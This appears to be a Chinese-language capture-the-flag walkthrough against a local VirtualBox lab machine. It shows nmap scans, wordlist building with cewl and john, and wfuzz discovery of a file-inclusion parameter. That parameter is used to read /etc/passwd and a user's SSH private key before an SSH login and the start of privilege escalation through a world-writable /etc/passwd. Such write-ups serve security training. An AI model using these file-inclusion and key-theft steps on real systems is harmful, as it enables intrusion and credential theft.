nmap -sT -min-rate 10000 -p- 192.168.56.3 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 01:40 EST Nmap scan report for192.168.56.3 Host is up (0.00067s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:6A:06:79 (Oracle VirtualBox virtual NIC)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
nmap -sT -sV -O -p 22,80192.168.56.3 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 01:41 EST Nmap scan report for192.168.56.3 Host is up (0.00080s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 ((Debian)) MAC Address: 08:00:27:6A:06:79 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1 2 3 4 5 6 7 8 9 10 11 12 13 14
nmap -script=vuln -p 22,80192.168.56.3 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 01:42 EST Nmap scan report for192.168.56.3 Host is up (0.0010s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: |_ /robots.txt: Robots file MAC Address: 08:00:27:6A:06:79 (Oracle VirtualBox virtual NIC)
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endêmica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação Científica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro período de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o símbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antílope como símbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antílopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual.
没思路,打算生成字典
生成字典
使用cewl + john生成字典
1 2
cewl http://192.168.56.3/robots.txt > dict.txt john --wordlist=dict.txt --rules --stdout > dict-john.txt
******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://192.168.56.3/n3gr4/m414nj3.php?FUZZ=/etc/passwd Total requests: 951
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000589: 20022 L 26 W 1066 Ch "page"
得到参数page
读取文件
尝试读取/etc/passwd文件
发现用户p4l4nc4 ,尝试读取其家目录文件,成功读取
再尝试读取其ssh私钥文件
尝试进行ssh私钥登录,兼容复制到rsa.key文件
1 2 3 4 5 6 7 8 9 10
chmod 700 rsa.key
ssh -i rsa.key p4l4nc4@192.168.56.3 The authenticity of host '192.168.56.3 (192.168.56.3)' can't be established. ED25519 key fingerprint is SHA256:F1H2S93bx6fgnjMCinI5RMZf/XIJS3u8KjLS15lO6rU. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.3' (ED25519) to the list of known hosts. Load key "rsa.key": error in libcrypto p4l4nc4@192.168.56.3's password:
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jan 2 03:51:02 2025 from 192.168.56.4 p4l4nc4@4ng014:~$
提权
查看/etc/passwd文件
1 2
p4l4nc4@4ng014:~$ ls -al /etc/passwd -rw-rw-rw- 1 root root 1066 Nov 1312:28 /etc/passwd